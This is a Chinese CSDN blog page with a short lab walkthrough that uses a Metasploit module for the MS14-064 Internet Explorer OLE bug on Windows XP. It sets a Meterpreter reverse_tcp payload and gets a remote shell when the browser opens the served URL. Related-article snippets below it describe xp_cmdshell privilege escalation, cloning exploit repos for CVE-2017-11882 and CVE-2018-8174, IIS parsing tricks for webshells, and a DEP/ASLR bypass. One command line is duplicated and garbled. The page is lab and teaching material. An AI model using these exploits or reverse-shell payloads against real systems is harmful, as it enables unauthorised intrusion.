利用XP ie浏览器的漏洞获取shell

已于 2022-06-19 16:16:04 修改
阅读量3.4k 收藏 1
点赞数 2
文章标签: linux 运维 服务器 web安全 windows
于 2022-03-12 21:23:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44195546/article/details/123450259
版权

实验环境:kali linux、windows XP Professional SP3.

实验工具:metasploit framework

功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution

实验过程:

1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp):

2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用set重新设置)

3.运行结果返回了一个url地址:http://192.168.1.24:8080/.在XP ie浏览器中执行该url地址:

 

成功获取shell

4.利用shell:

uuse exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_executionse exploit/windows/browser/ms14_064_ole_code_execution

渗透boy
关注
浏览器漏洞利用实战
悦分享
10-04 109
C++对象的前4字节存放了指向虚表的指针,如果我们用指向Shellcode的值覆盖了这个指针,调用任何对象的虚函数都会最终执行我们的Shellcode。首先是DEP的绕过。在XP SP3的IE中可以利用msvcrt.dll的代码段来提供Gadget,同时,msvcrt.dll还是一个没有开启ASLR的模块,因此如果所有的ROP Gadget全部来自没有开启ASLR模块,那么既可以绕过DEP,又可以绕过ASLR(不要忘了在Windows 7的IE8上,该漏洞也能触发,Win7中是开启了ASLR的)。
服务器管理员账号sa,一次利用MSSQL的SA账户提权获取服务器权限
weixin_39542742的博客
07-29 1004
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各...
office漏洞利用--获取shell
dianyan5615的博客
12-11 117
  环境:   kali系统, windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码,...
msf利用0DAY漏洞获取shell
Deeeelete的博客
02-23 723
安装CVE-2018-8174_EXP git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git 然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录 进入我们的文件目录 cd CVE-2018-8174_EXP-master/ 生成恶意html文件 python CVE-2018-8174.py -...
各种解析漏洞获取Webshell
weixin_34389926的博客
12-05 844
各种解析漏洞shell  一、IIS 6.0解析漏洞 IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执...
基于XP系统IE极光漏洞渗透
Lorezon的博客
12-10 623
极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用shell,同时会严重占用目标机器的CPU,导致机器卡死。那么话不多说,直接开搞。 首先,在msf搜索10_002 然后调用 然后设置payload 之后show options,设置选项 设置好了之后启动 已经启动成功,接下来就想办法让目标靶机用...
【APP漏洞挖掘实战】某下载量超101万的APP有几个漏洞可以GetShell
shandongjiushen的博客
01-30 802
一个APP可能存在多个漏洞
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 2044
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
利用WebDAV获取Shell
kevink的博客
12-30 469
### 个人心得 WebDAV感觉是用在IIS 上的,nginx用不了。 ### WebDAV WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。 #### 定义 Micr
简述Windows XPWindows 7系统常见漏洞
黑白程序的博客
10-09 3124
1.Windows XP系统常见漏洞 Windows XP系统常见的漏洞有UPNP服务漏洞、升级程序漏洞、帮助和支持中心漏洞、压缩文件夹漏洞、服务拒绝漏洞Windows Media Player漏洞、RDP漏洞、VM漏洞、热键漏洞、账号快速切换漏洞等。 (1)UPNP服务漏洞 漏洞描述:允许攻击者执行任意指令。 Windows XP默认启动的UPNP服务存在严重安全漏洞。UPNP(Uni
关于xp_cmdshell
qq_42036164的博客
12-28 1044
xpcmdshell
BCP_XP_SHELL_FTP_UPDLOAD
扯蛋的青春与蛋痛的生活
02-28 2225
xp_cmdshell bcp ftpupload 最近公司有一个单子,大致是把查数据库的数据导出,再上传到某FTP服务器(至少一开始我是这样想的) 有几点我是需要查询的知识. xp_cmdshell 下面一段转载 -----------------------------------------------------------------
xp_cmdshell简单介绍
nekopoch的博客
01-17 2549
简介 xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 用于运行命令行(cmd)。 这对于使用T-SQL在操作系统中运行诸如复制文件,创建文件夹,共享文件夹等任务非常有用。 (45条消息) 如何使用xp_cmdshell扩展过程_culuo4781的博客-CSDN博客 相关命令 命令行命令基本上都可用 以下只列出来部分 dir 查看文件目录 相当于linux的ls type 显示文本内容 type [drive:] [pa
WinXP系统的Shell文件夹 路径修改
nisikawaguti的专栏
01-22 1750
电脑是可爱的,Windows是脆弱的,重装系统当然是烦恼的。电脑重装系统,一些特殊的文件夹,如“桌面图标”、“我的文档”、“收藏夹”或是“Outlook里的重要邮件”等,都会丢失。为避免这种情况发生,我们可以将这些特殊的文件夹路径指向其他盘。以WinXP为例:首先要在“开始”——“运行”内输入“regedit”打开注册表编辑器,然后要在“文件”下拉菜单中的“导出”功能备
漏洞利用提权(一):提权基础
黎先生的博客
02-15 4359
1. 提权概述 1.1 概述 提权顾名思义就是提高自己在系统中的权利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞获取WebShell权限,然后进行提权提权可分为: 操作系统提权 Windows Linux Samba Android 应用程序提权 Seru-u Radmin SQL Server 2000/2005、MySQL、Oracle Java IE 例如Wi...
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5030
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞
最新发布
m0_74168970的博客
04-24 429
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
渗透测试项目一
giantbranch的专栏
11-25 7000
实验来源:合天网安实验室:http://www.hetianlab.com/ 实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络技术、网络安全与防护实验时数(学分):4学时实验类别:实践实验类 实验场景 某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心
黑客利用Linux备份漏洞获取shell
本文档主要探讨了黑客...这篇文章提供了一种黑客利用PHP和Web服务器配置漏洞获取Linux系统shell权限的实例,旨在警示网络安全专业人士和系统管理员要时刻警惕此类攻击,并采取适当的安全措施来保护系统免受类似威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值